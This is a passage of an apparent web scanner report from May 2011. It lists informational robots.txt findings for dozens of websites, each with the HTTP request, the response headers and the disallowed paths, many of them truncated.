27.150. http://www.autointell.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autointell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autointell.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:18:48 GMT
Server: Apache/2.2
Last-Modified: Mon, 07 May 2007 10:57:34 GMT
ETag: "1800c06d-37-42fdf2b174380"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /in_data/

27.151. http://www.automobilesreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automobilesreview.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.automobilesreview.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:34:08 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 14 Apr 2011 08:51:51 GMT
ETag: "6c291d-147-4a0dd094b77c0"
Content-Length: 327
Accept-Ranges: bytes

User-Agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/themes
Allow: /

Sitemap: http://www.automobilesreview.com/sitemap/sitemap.xml.gz
Sitemap:
...[SNIP]...

27.152. http://www.autorepairlocal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autorepairlocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autorepairlocal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:01 GMT
Content-Length: 489
Content-Type: text/plain;charset=utf-8
Set-Cookie: osid=site1~eabdcf4bb48a7b392fcfc0faa7299c83074ceab7; expires=Wed, 04 May 2011 03:23:01 GMT; Path=/
Connection: close

Sitemap: http://www.autorepairlocal.com/sitemap.xml

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /privacy
Disallow: /privacypolicy
Disallow: /terms
Disallow: /apps
Disallow: /l
...[SNIP]...

27.153. http://www.autosupplyco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autosupplyco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autosupplyco.com

Response

HTTP/1.1 200 OK
Content-Length: 1593
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:27 GMT
Connection: close

User-agent: dotbot
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent:*
Disallow: /images/
Disallow: /itemimages/
Disallow: /Iif/
Disallow: /iif/
Disallow: /Data/
Disallow: /webstor
...[SNIP]...

27.154. http://www.autotraderlatino.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderlatino.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotraderlatino.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:01 GMT
Server: Apache
Content-Location: robots.txt.php
Vary: negotiate,Accept-Encoding,User-Agent
TCN: choice
X-Powered-By: PHP/5.3.0
Set-Cookie: mobile=false; expires=Fri, 03-Jun-2011 04:05:01 GMT; path=/; domain=.autotraderlatino.com
Content-Length: 40
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerautomercado=2927812618.4110.0000; path=/

User-Agent: *
Allow: /
Disallow: /ad.php

27.155. http://www.autoweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autoweb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autoweb.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Feb 2011 01:10:01 GMT
Accept-Ranges: bytes
ETag: "8c941290bfd3cb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 268
Date: Wed, 04 May 2011 04:07:55 GMT
Connection: close

User-agent: *
Disallow: /content/landing/
Disallow: /system/
Disallow: /*/compare/
Disallow: /*/Compare/
Disallow: /content/research/virtual-brochure/

User-agent: NPBot
Disallow: /

User-ag
...[SNIP]...

27.156. http://www.avaxdownload.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avaxdownload.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.avaxdownload.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 04 May 2011 02:06:14 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Sun, 16 May 2010 11:01:51 GMT
Accept-Ranges: bytes
Content-Length: 540
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 01:58:34 GMT
Vary: Accept-Encoding

User-agent: Googlebot
Disallow: /torrent/
Disallow: /forum/
Disallow: /engine/
Disallow: /engine/redirect.php
Disallow: /dlelinks.php
Disallow: /cgi-bin/
Disallow: /mybackup/
Disallow: /email/
...[SNIP]...

27.157. http://www.avfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avfair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.avfair.com

Response

HTTP/1.1 200 OK
Content-Length: 132
Content-Type: text/plain
Content-Location: http://www.avfair.com/robots.txt
Last-Modified: Thu, 18 May 2006 07:44:20 GMT
Accept-Ranges: bytes
ETag: "ec98edf4e7ac61:369"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:13 GMT
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.158. http://www.aviationweek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aviationweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aviationweek.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 03:03:03 GMT
Content-type: text/plain
Last-modified: Wed, 08 Jul 2009 19:30:40 GMT
Content-length: 132
Etag: "84-4a54f3e0"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.159. http://www.b3ta.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b3ta.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.b3ta.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 02:08:39 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 484
Last-Modified: Sun, 13 Mar 2011 22:41:06 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Crawl-delay: 1
Disallow: /board/write.php
Disallow: /calendar/write.php
Disallow: /friends/
Disallow: /gaz/
Disallow: /links/write.php
Disallo
...[SNIP]...

27.160. http://www.babepond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babepond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babepond.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:07 GMT
Server: Apache/2.2
Vary: Cookie
X-Pingback: http://babepond.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.161. http://www.baby2see.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baby2see.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.baby2see.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:23 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 05:17:11 GMT
ETag: "3052c68f-1a6-4d96b157"
Accept-Ranges: bytes
Content-Length: 422
Connection: close
Content-Type: text/plain


User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot-Images
Disallow: /

User-agent: *
Allow: /cgi/aws/apf4.cgi

Disallow: /s/
Disallow: /cgi/aws/
Disallow: /cgi/
Disallow: /cgi-bin/
Di
...[SNIP]...

27.162. http://www.bachmanntrains.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bachmanntrains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bachmanntrains.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 17 Jun 2009 00:05:53 GMT
ETag: "60009317-19-46c800dfada40"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.163. http://www.backpaindetails.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backpaindetails.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backpaindetails.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Wed, 25 Nov 2009 14:33:49 GMT
ETag: "504a543-17-47932f266ed40"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.164. http://www.backtothebible.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backtothebible.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.backtothebible.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:26 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 29 Sep 2008 09:45:47 GMT
ETag: "6a8369-10a-45805bb4848c0"
Accept-Ranges: bytes
Content-Length: 266
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /media/
Dis
...[SNIP]...

27.165. http://www.badideatshirts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.badideatshirts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.badideatshirts.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 19:54:58 GMT
Accept-Ranges: bytes
ETag: "be25ffa7823cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:16 GMT
Connection: close
Content-Length: 258

User-Agent: *
Disallow: /Admin/
Disallow: /Checkout/
Disallow: /ClientApi/
Disallow: /ConLib/
Disallow: /FCKeditor/
Disallow: /Install/
Disallow: /Layouts/
Disallow: /Members/
Disallow: /webc
...[SNIP]...

27.166. http://www.bagbliss.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bagbliss.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bagbliss.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:57:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 21 Jan 2011 12:59:20 GMT
ETag: "8c9503-20c-49a5ad1891a00"
Accept-Ranges: bytes
Content-Length: 524
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*/feed/$
Disallow: /*/feed/rss/$
Disallow: /*/trackback/$
Disallow: /wp-
Disallow: */feed
Disallow: */trackback
Disallow: /rss/
Disallow: /comments/feed/
Disallow: /date/
Disa
...[SNIP]...

27.167. http://www.bagbunch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bagbunch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bagbunch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:17:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 22 Oct 2009 17:48:07 GMT
ETag: "1e3000a-17c-47689b2ab23c0"
Accept-Ranges: bytes
Content-Length: 380
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *

Disallow: /thank-you-for-subscribing-action-required/

Disallow: /wp-

Disallow: /feed

Disallow: /comments/feed

Disallow: /feed/$

Disallow: /*/feed/$

Disallow: /*/feed/rss/$

Disall
...[SNIP]...

27.168. http://www.bagsunlimited.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bagsunlimited.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bagsunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2011 19:01:43 GMT
Accept-Ranges: bytes
ETag: "fee441e7c3f3cb1:be7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:29:07 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.169. http://www.bahamas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bahamas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bahamas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:26 GMT
Server: Apache
Last-Modified: Fri, 28 May 2010 06:41:10 GMT
ETag: "afa808-636-cadfed80"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:31:26 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.170. http://www.bandai.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bandai.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bandai.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:34 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 22:23:34 GMT
ETag: "21c991-73-45f36ece2c580"
Accept-Ranges: bytes
Content-Length: 115
Keep-Alive: timeout=5, max=98
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServercluster_forum=1325465866.16415.0000; path=/

# robots.txt
User-agent: *
Disallow:
Disallow: /error
Disallow: /search
Sitemap: http://www.bandai.com/sitemap.xml

27.171. http://www.bandweblogs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bandweblogs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bandweblogs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 14 Aug 2010 05:34:31 GMT
ETag: "8c29eb-132-48dc1f42347c0"
Accept-Ranges: bytes
Content-Length: 306
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: http://bandweblogs.com/blog/sitemap.xml

User-agent: Googlebot
Disallow: /*/trackback
Disallow: /*?*
Disallow: /*?
Disallow: /*page/*

User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
D
...[SNIP]...

27.172. http://www.bankserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankserv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bankserv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:52 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 16:40:12 GMT
ETag: "638c3-12a-3c3e1300"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /webmail/
Disallow: /products/p2p_products.html
Disallow: /multimedia/
Disallow: /restricted/
Disallow: /restricted2/
Disallow: /restricted3/
Disallow: /demo/

User-agent: psbo
...[SNIP]...

27.173. http://www.barcap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barcap.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:04:22 GMT
ETag: W/"388-1273660373000"
Last-Modified: Wed, 12 May 2010 10:32:53 GMT
Content-Type: text/plain
Content-Length: 388
Connection: close

User-agent: *
Disallow: /mifidabc
Disallow: /Client+offering/Barclays+Natural+Resource+Investments
Disallow: /emaildisclaimer
Disallow: /emaildisclaimer/fr
Disallow: /salesandtradingdisclaimer
D
...[SNIP]...

27.174. http://www.barcelona-tourist-guide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcelona-tourist-guide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barcelona-tourist-guide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.17
Last-Modified: Fri, 11 Feb 2011 21:25:58 GMT
ETag: "1b1c0f0-1815-49c085810a580"
Accept-Ranges: bytes
Content-Length: 6165
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain


# specifically allowed robots:

User-agent: Mediapartners-Google*
Disallow:


#pages that should not be indexed:

User-Agent: *
Disallow: /captcha/
Disallow: /cgi-bin/
Disallow: /formmail/
Disallo
...[SNIP]...

27.175. http://www.bard.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bard.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bard.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:12 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8
Last-Modified: Fri, 28 Jan 2011 20:07:46 GMT
ETag: "1ea-133-4d432212"
Accept-Ranges: bytes
Content-Length: 307
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tools/
Disallow: /lib/
Disallow: /webtest/
Disallow: /graduate/mfa/gallery/faculty/
Disallow: /graduate/mfa/gallery/students/
Disallow: /mfa/gallery/faculty/
Disallow: /mfa/ga
...[SNIP]...

27.176. http://www.barefootstudent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barefootstudent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barefootstudent.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:13:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Wed, 10 Mar 2010 14:01:10 GMT
ETag: "2c58a2a-1b-48172baf95580"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.177. http://www.barfineasia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barfineasia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barfineasia.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

27.178. http://www.bargainbriana.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bargainbriana.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bargainbriana.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:16 GMT
Server: Apache
X-Pingback: http://bargainbriana.com/xmlrpc.php
Set-Cookie: wwsgd_visits=1; expires=Thu, 03-May-2012 01:07:17 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.179. http://www.bargainnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bargainnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bargainnews.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Apr 2011 15:38:17 GMT
Accept-Ranges: bytes
ETag: "70b592a427f9cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:14:09 GMT
Connection: close
Content-Length: 329

User-agent: *
Disallow: /api/
Disallow: /keepalive/
Disallow: /mail_utility/
Disallow: /placead/
Disallow: /tmpphotos/
Disallow: /listings_redirect.cfm
Disallow: /catresult.cfm
Disallow: /even
...[SNIP]...

27.180. http://www.barnettesengines.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnettesengines.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnettesengines.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:25 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 21:03:28 GMT
ETag: "3b1aff-193-4db5e1a0"
Accept-Ranges: bytes
Content-Length: 403
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /cache/
Disallow: /_backup/
Disallow: /_mygallery/
Disallow: /_temp/
Disallow: /_tempalbums/
Disallow: /_tmpfileop/
Disallow: /dbboon/
Disallow: /Flash/
Disallow: /images/
Di
...[SNIP]...

27.181. http://www.barnorama.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barnorama.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.barnorama.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:49:26 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.16
Vary: Cookie
X-Pingback: http://www.barnorama.com/xmlrpc.php

User-agent: *
Disallow:

27.182. http://www.batterydepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.batterydepot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.batterydepot.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Jun 2009 14:04:23 GMT
ETag: "6852128-cf-22e947c0"
Accept-Ranges: bytes
Content-Length: 207
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
<?php
   if(substr($_SERVER["SCRIPT_URI"], 0, 8) == "https://") {
       ?>Disallow: /<?php
   }
   else {
?>Disallow: /order/
Disallow: /webadmin/
Disallow: /cart_proc.php
Disallow: /cart.php<?php
...[SNIP]...

27.183. http://www.battleformarriage.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.battleformarriage.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.battleformarriage.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:06 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Mon, 05 Jan 2009 16:05:10 GMT
ETag: "971b6f-24e-7482d980"
Accept-Ranges: bytes
Content-Length: 590
Vary: Accept-Encoding

# robots.txt generated at www.mcanerin.com
User-agent: Googlebot
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Crawl-delay: 10
Disallow:

User-agent: Teoma
Disallow:

User-agent: Giga
...[SNIP]...

27.184. http://www.bauerfinancial.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bauerfinancial.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bauerfinancial.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2005 14:23:00 GMT
Accept-Ranges: bytes
ETag: "07a98afa012c51:468"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:44 GMT
Connection: close

User-agent: *
Disallow:

27.185. http://www.bboxbbs.ch/cgi-bin/Count.exe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bboxbbs.ch
Path:   /cgi-bin/Count.exe

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bboxbbs.ch

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 00:49:47 GMT
Server: WebSite/3.5.19
Accept-ranges: bytes
Content-type: text/plain
Last-modified: Fri, 07 Oct 2005 19:05:08 GMT
Content-length: 337

User-agent: *
Disallow: /info/router/
Disallow: /login.html
Disallow: /list/
Disallow: /icqlist/
Disallow: /home/counter/
Disallow: /reports/
Disallow: /forum/
Disallow: /wwwemail/
Disallow:
...[SNIP]...

27.186. http://www.bcpl.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcpl.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bcpl.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:25 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 05 Jan 2011 13:41:11 GMT
ETag: "171e033-624-4991989bdebc0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:31:25 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.187. http://www.beachthemeweddingshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beachthemeweddingshop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beachthemeweddingshop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 Nov 2009 00:15:02 GMT
ETag: "894d-c0-478358d0ecd80"
Accept-Ranges: bytes
Content-Length: 192
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=604800
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /store/
Disallow: /store/home.php$
Disallow: /store/product.php$
Disallow: /store/admin/
Disallow: /store/provider/
Disallow: /store/files/
Disallow: /cgi-bin/

27.188. http://www.beangroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beangroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beangroup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:34:55 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 04 Nov 2007 18:01:24 GMT
ETag: "c581ed-45-301d2500"
Accept-Ranges: bytes
